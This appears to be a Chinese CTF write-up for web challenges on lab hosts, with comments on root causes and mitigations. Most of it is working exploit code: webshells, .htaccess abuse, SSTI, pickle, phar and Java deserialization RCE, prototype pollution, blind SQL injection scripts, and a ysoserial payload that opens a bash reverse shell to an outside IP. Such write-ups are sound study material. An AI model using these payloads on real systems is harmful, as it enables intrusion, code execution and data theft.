Web

phpdest

require_once限制了同一个文件只能包含一次,因此不能直接再次包含flag.php;下面的路径通过多层 /proc/self/root 符号链接,使PHP不把它识别为已经包含过的同一文件

?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

image-20220525214236103

得到的内容base64解码即可

EasyPHP

set_error_handler设置成了打印flag的函数

传一个数组让它报错就行了(参数类型不符产生的错误会触发上面设置的错误处理函数)

image-20220525214402322

SimpleRCE

aaa=show_source(str_rot13('/synt'));

image-20220525214639699

funny_upload

php > echo base64_encode('<?php eval($_POST[0]);?>');
PD9waHAgZXZhbCgkX1BPU1RbMF0pOz8+

上传shell.png 内容就是这一串base64

然后上传.htaccess

# Per-directory override uploaded next to shell.png.
# Line 1 maps the .png extension to the PHP handler for this directory.
# Line 2 makes every PHP request in the directory append shell.png after passing it
# through the base64-decode filter, so the stored file never contains a literal
# PHP open tag (presumably what the upload check looks for; the check is not shown).
# Hardening: serve upload directories with "AllowOverride None", reject uploaded
# file names that start with a dot, and keep uploads outside the document root.
AddType application/x-httpd-php .png
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/uploads/c47b21fcf8f0bc8b3920541abd8024fd/shell.png"

image-20220525221030844

或者

import socket
import string
import requests
import time
def send(flag,length):
    """Upload a ``.htaccess`` whose ``<If>`` expression tests ``/flag`` against a regex.

    The request is written to a raw socket so that the ``Content-Length`` header
    can be supplied by the caller (``length``) instead of being computed by an
    HTTP library. ``flag`` is interpolated into the ``<If "file('/flag') =~ /.../">``
    expression; when that expression matches, the directory's 404 page becomes the
    marker string ``xux``. The response is not read here.

    Root cause on the server side: the upload directory accepts a file named
    ``.htaccess`` and the web server honours per-directory overrides there.
    ``AllowOverride None`` for upload directories and rejecting dot-file names
    remove this oracle.
    """
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn",81))
    data = f'''POST / HTTP/1.1
Host: 2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11586810801148743996859451927
Content-Length: {length}
Origin: http://2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81
Connection: close
Referer: http://2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81/
Cookie: token=eyJhZG1pbiI6dHJ1ZX0.YBEFFA._EzwGG57OrghZrI9PTJv5uNm0hI
Upgrade-Insecure-Requests: 1

-----------------------------11586810801148743996859451927
Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/png

<If "file('/flag')=~ /{flag}/">
ErrorDocument 404 "xux"
</If>
-----------------------------11586810801148743996859451927
Content-Disposition: form-data; name="1"

提交查询
-----------------------------11586810801148743996859451927--'''.replace('''
''','\\r\\n').split("\\r\\n")
    # The template's newlines were swapped for a literal marker and split again,
    # so each element is one line of the request; CRLF is re-added on send.
    for i in data:
        temp = (i+"\r\n").encode()
        s.send(temp)
# Boolean oracle driven by the uploaded .htaccess: one candidate character is
# tested per upload, and the 404 body tells whether the regex matched.
# Defender view: this shows up in logs as a rapid series of .htaccess uploads,
# each followed by a request for a non-existent path in the same directory.

# Content-Length passed to send(); it is incremented with every character
# appended to the prefix (presumably 400 matches the body for the initial
# prefix -- not verifiable from this listing).
length = 400
# Candidate alphabet: digits, lower case, "_-{}", upper case.
d = string.digits + string.ascii_lowercase  +  r"_-{}" + string.ascii_uppercase
# Known flag prefix used as the starting point of the regex.
flag = "Dest0g3{"
for i in range(100):
    for t in d:
        send(flag+t,length)
        # "aaa" is requested only to obtain the directory's 404 response.
        rep = requests.get("http://2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/aaa").text
        # The marker is present only when the <If> expression matched.
        if 'xux' in rep:
            flag+=t
            length+=1
            print(flag)
            break
        time.sleep(0.1)

image-20220525222139902

EasySSTI

import requests
import re

# Server-side template injection through the login form's username field.
# The template text below contains no quote characters, dots, underscores or
# square brackets, and uses a newline instead of a space after "{%set";
# presumably those are what the target's input filter rejects (filter not shown).
# Every string is assembled from dict keys joined together or from single
# characters picked out of the string form of existing objects.
# Takeaway for defenders: a character blacklist does not make user input safe
# to use as template source. Pass user input as a variable to a fixed template,
# and use Jinja2's SandboxedEnvironment where templates must be user-supplied.
url = "http://3fbb08f6-c806-4246-8e4c-b82d6b89a704.node4.buuoj.cn:81/login"
# Variables defined inside the payload:
# a    = "pop"
# b    = "_"            (character 18 of str(lipsum))
# c    = "__globals__"
# d    = "__getitem__"
# e    = "os"
# f    = " "            (character 9 of str(lipsum))
# g    = "/"            (character -8 of the os module's string form)
# flag = "cat /flag"
# h    = "popen"
# i    = "read"
# z    = character -5 of the os module's string form; not used in the final expression
payload =  '''{%set
a=dict(po=aa,p=aa)|join%}{%set
b=lipsum|string|list|attr(a)(18)%}{%set
c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set
d=(b,b,dict(ge=cc,tit=dd,em=aa)|join,b,b)|join%}{%set
e=dict(o=cc,s=aa)|join%}{%set
f=lipsum|string|list|attr(a)(9)%}{%set
g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-8)%}{%set
flag=(dict(cat=aa)|join,f,g,dict(flag=aa)|join)|join%}{%set
h=(a,dict(en=aa)|join|join)|join%}{%set
i=dict(re=aa,ad=aa)|join%}{%set
z=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-5)%}{{lipsum|attr(c)|attr(d)(e)|attr(h)(flag)|attr(i)()}}'''
print(payload)
# The payload is sent as the username; the password value is a filler.
data = {
    "username":payload,
    "password":"xux"
}
rep = requests.post(url=url,data=data).text
print(rep)

image-20220525222242251

middle

写opcode,比较简单,往栈中压一个列表即可

import pickle
import pickletools
import base64
import requests
# Hand-written protocol-0 pickle stream. Opcode by opcode:
#   c config / backdoor -> GLOBAL: push the callable config.backdoor
#   (                   -> MARK
#   ]                   -> EMPTY_LIST
#   V...                -> UNICODE: push the expression string
#   a                   -> APPEND the string to the list
#   t                   -> TUPLE: build the argument tuple (one list) back to the MARK
#   R                   -> REDUCE: call config.backdoor with that tuple
#   .                   -> STOP
# config.backdoor belongs to the target application and is not shown here;
# presumably it evaluates the list's first element -- confirm against the source.
# Root cause: the server unpickles request data. An Unpickler.find_class allowlist
# is only as safe as the callables it admits; untrusted input should go through
# a data-only format such as JSON instead.
# poc = '__import__("os").system("whoami")'
poc = b'''cconfig
backdoor
(]V__import__("os").popen("cat /flag.txt").read()
atR.'''
# Disassemble locally to check that the stream is well formed before sending.
pickletools.dis(poc)
payload = base64.b64encode(poc)
print(payload)
# The endpoint takes the base64 text in the "data" form field.
rep = requests.post(url="http://2e0225b1-77e1-4b0c-8508-2b6b1b70bb4f.node4.buuoj.cn:81/home",data={"data":payload})
print(rep.text)

image-20220525222651024

PharPOP

<?php
// Builds exp.phar with an object graph stored as the archive's metadata.
// The class names presumably mirror classes defined by the target application
// (not shown); only the names and property layout matter for the serialized form.
// Background for defenders: before PHP 8.0 the metadata of a phar is unserialized
// automatically when a filesystem function opens a phar:// path, so any file
// operation on a user-controlled path becomes a deserialization sink.
// Mitigations: never pass user-controlled paths or schemes to filesystem
// functions, reject the phar:// scheme explicitly, and run PHP 8.0 or later,
// where metadata is no longer unserialized implicitly.
class tree{
    public $name;
    public $act;
}
class apple{

}
class air{
    public $p;
}
$tree = new tree();
$air = new air();
// $air->p is not initialised before this assignment.
$air->p->act = "SplFileObject";
$apple = new apple();


// flag and xxx are not declared on apple; they are set as dynamic properties.
$apple->flag = "/fflaggg";
$tree->name = $apple;
$apple->xxx = $air;
// Print the serialized graph for inspection.
echo serialize($tree);
$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
// The object graph travels in the manifest metadata, not in a file entry.
$phar->setMetadata($tree);
// Placeholder entry added alongside the metadata.
$phar->addFromString("test.txt","test");
$phar->stopBuffering();

运行得到exp.phar

将2改为3来绕过throw new Error("start");

image-20220527102718927

修改了phar文件后还要改一下签名

# Recompute the trailing signature of exp.phar after its contents were edited.
# Layout assumed by the slicing below: the last 8 bytes are kept as-is
# (presumably the signature-type field and the trailing magic), the 20 bytes
# before them are the SHA-1 digest, and everything earlier is the signed data.
# The signature is an unkeyed hash, so it only detects accidental corruption:
# anyone who can edit the archive can also recompute it. It is not evidence
# that an archive is authentic.
from hashlib import sha1
f = open("exp.phar",'rb').read()
s = f[:-28]   # signed data: everything except digest (20 bytes) + trailer (8 bytes)
h = f[-8:]    # trailer, copied unchanged
newf = s + sha1(s).digest() + h
open("test.phar",'wb').write(newf)  

得到test.phar

因为waf有对传入的数据进行检测,过滤了php

使用gzip对test.phar压缩一次

最终exp:

import requests
import re
# Two-step use of the target's endpoint: store the archive, then reference it
# through the phar:// wrapper so that its metadata is unserialized.
# Points for defenders that this listing illustrates:
#   * The upload filter inspects the raw bytes (per the write-up it rejects
#     "php"), but the archive is gzip-compressed, so the bytes it sees do not
#     contain the filtered text. Content scanning of uploads is not a control
#     against phar metadata; restricting which path schemes reach filesystem
#     functions is.
#   * The stored file has a .jpg name and is still opened as an archive, so
#     the file extension is not a control either.
url  = "http://f7049b15-42dc-4336-b4a4-5c45454778f7.node4.buuoj.cn:81/"

def send():
    """POST the gzip-compressed archive; field "1" carries a serialized object with start="w"."""
    # NOTE(review): the serialized string declares 10 properties but supplies
    # one -- presumably deliberate (see the write-up text); confirm.
    rep = requests.post(url=url,data={
        "1":'O:1:"D":10:{s:5:"start";s:1:"w";}',
        '0':open("test.phar.gz",'rb').read()
    }).text
    print(rep)

def hack(file):
    """POST ``file`` as field "0" with start="r" and print the first flag-shaped match in the response."""
    rep = requests.post(url=url,data = {
        "1":'O:1:"D":10:{s:5:"start";s:1:"r";}',
        "0":file
    }).text
    flag = re.findall(r"Dest0g3{.*?}",rep)[0]
    print(flag)
# send() was run once beforehand; the path below is where the upload was stored.
#send()
#/tmp/915fa1e9fb473b8e2aff23ab61aa857a.jpg
hack("phar:///tmp/915fa1e9fb473b8e2aff23ab61aa857a.jpg")

image-20220527103704826

ezip

新建一个shell.zip,其中含有一个1.php以及空的1.txt

1.php的内容为

<?php
// Evaluates POST field "0" as PHP code. Any file of this shape inside a
// web-served directory means arbitrary code execution for whoever can reach it;
// extraction and upload directories should not be configured to execute PHP.
eval($_POST[0]);
?>

打开010editor

image-20220527110156652

将1.txt改为/////

上传shell.zip,提示解压失败,但1.php已经被解压(推测解压是逐个条目进行的:非法文件名 ///// 使解压中途报错,而此前已经写出的1.php没有被清理)

image-20220527110224260

image-20220527110305531

看了一下没权限读flag

image-20220527110511476

image-20220527110542218

NodeSoEasy

image-20220527110714259

image-20220527110719921

污染模板引擎的escapeFunction选项(渲染时对应内部的escapeFn)即可

{"__proto__":{"client":true,"escapeFunction":"1; return global.process.mainModule.constructor._load('fs').readFileSync('/flag');","compileDebug":true}}

image-20220527110905986

Really Easy SQL

import requests
import time
import string
# Time-based blind SQL injection through the username field, recovering one
# character per outer iteration with a binary search over printable ASCII.
# The injected text closes a string literal, adds a further comma-separated
# value and a closing parenthesis, then comments out the rest; this looks like
# an INSERT ... VALUES context (the query itself is not shown -- confirm).
# Root cause: the username is concatenated into the SQL statement. The fix is a
# parameterized query; filtering individual characters or keywords is not.
# Detection: benchmark() or similar delay functions in request parameters, and
# bursts of login requests whose latency alternates between fast and slow.
url = "http://xxxxxx/index.php"

# Known flag prefix; recovery starts at the next character position (1-based, as mid() expects).
flag = "Dest0g3{"
for i in range(len(flag)+1,100):
    # Search bounds: printable ASCII. NOTE(review): these names shadow the builtins max/min.
    max = 127
    min = 32
    while(abs(max-min)>0):
        mid = (max+min)//2
        data = {
            # Earlier stages, kept for reference: table names, then column names of "flaggg".
            #"username":f"admin',if((select(ascii(mid((group_concat(table_name)),{i},1)))from(information_schema.tables)where(table_schema=database()))>{mid},benchmark(100000,sha(1)),1))#",
            #"username":f"admin',if((select(ascii(mid((group_concat(column_name)),{i},1)))from(information_schema.columns)where(table_name='flaggg'))>{mid},benchmark(100000,sha(1)),1))#",
            "username":f"admin',if((select(ascii(mid((group_concat(cmd)),{i},1)))from(flaggg))>{mid},benchmark(900000,sha(1)),1))#",
            "password":"admin"
        }
        # Wall-clock time of the request is the only signal.
        d1 = time.time()
        # Traffic is routed through a local proxy on 127.0.0.1:8080.
        requests.post(url=url,data=data,proxies={"http":"127.0.0.1:8080"})
        d2 = time.time()
        # Slow response: the comparison was true, so the character code is above mid.
        if d2-d1>1:
            min = mid + 1
        else:
            max = mid
        time.sleep(0.5)
    # Bounds have converged on the character code.
    flag+=chr(max)
    print(flag)

easysql

跟前一题的区别好像是多过滤了大于和小于号

把脚本改一下

import requests
import time
import string
# Variant of the previous script for a filter that, per the write-up, also
# rejects "<" and ">": the comparison becomes an equality test, so each position
# is checked against every candidate code instead of being binary-searched.
# The underlying flaw is unchanged (user input concatenated into SQL), which is
# why removing two more characters from the accepted input did not close it;
# a parameterized query does.
url = "http://xxxxxx/index.php"

# Candidate characters: digits, lower case and "-}{", converted to their codes.
s = string.digits + string.ascii_lowercase + "-}{"
ss = [ord(i) for i in s]
# Prefix recovered so far.
flag = "Dest0g3{8be"
for i in range(len(flag)+1,100):
    for t in ss:
        data = {
            "username":f"admin',if((select(ascii(mid((group_concat(cmd)),{i},1)))from(flaggg))={t},benchmark(900000,sha(1)),1))#",
            "password":"admin"
        }
        # Request latency is the only signal; the threshold here is 2 seconds.
        d1 = time.time()
        requests.post(url=url,data=data,proxies={"http":"127.0.0.1:8080"})
        d2 = time.time()
        if d2-d1>2:
            flag+=chr(t)
            print(flag)
        time.sleep(0.5)

跑了半天QwQ

EzSerial

image-20220527112359723

user处的数据是java序列化后的数据的base64编码后的结果

推测在user处传入的数据会被base64解码后反序列化

import requests
import os
import base64

# Tries the ysoserial CommonsCollections1..7 gadget chains against a cookie that,
# per the write-up, holds base64-encoded Java serialized data.
# Root cause: the application deserializes a client-controlled cookie with
# native Java serialization. Defensive measures:
#   * do not deserialize client-supplied data; keep state server-side or use a
#     data-only format protected by a MAC;
#   * where native deserialization cannot be removed, install an
#     ObjectInputFilter allowlist (JEP 290);
#   * keep gadget-bearing libraries off the classpath or patched.
# Detection: base64 of a Java serialization stream starts with "rO0AB", so a
# cookie or parameter with that prefix is worth alerting on.
url = "http://9c8254ad-4ea0-43ba-88a0-51a12b53ce9c.node4.buuoj.cn:81/admin/index.jsp"

# Names of the gadget chains to try, CommonsCollections1 through CommonsCollections7.
payloadlist = []
for i in range(1,8):
    payloadlist.append(f"CommonsCollections{i}")
for payload in payloadlist:
    # ysoserial writes the serialized object to a local file named "payload";
    # the command argument is a base64-wrapped shell command.
    payload = 'java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ' + payload + ' "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Mi4xOTIuNDIuNDgvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}" > payload'
    os.system(payload)
    # Base64-encode the raw stream so it matches the cookie's expected format.
    exp = base64.b64encode(open("payload",'rb').read()).decode()
    print(exp)
    # The response body is fetched but not inspected.
    rep = requests.get(url=url,cookies={
        "JSESSIONID":"CB0DE07D94F9C047F6D52BCEE88A73E8", 
        "user":exp
    }).text
    

image-20220527112948140